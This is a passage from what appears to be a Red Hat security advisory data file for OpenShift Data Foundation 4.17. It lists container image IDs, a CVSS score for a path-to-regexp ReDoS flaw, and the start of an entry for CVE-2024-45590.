"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "path-to-regexp: Backtracking regular expressions cause ReDoS", }, { cve: "CVE-2024-45590", cwe: { id: "CWE-405", name: "Asymmetric Resource Consumption (Amplification)", }, discovery_date: "2024-09-10T16:20:29.292154+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", 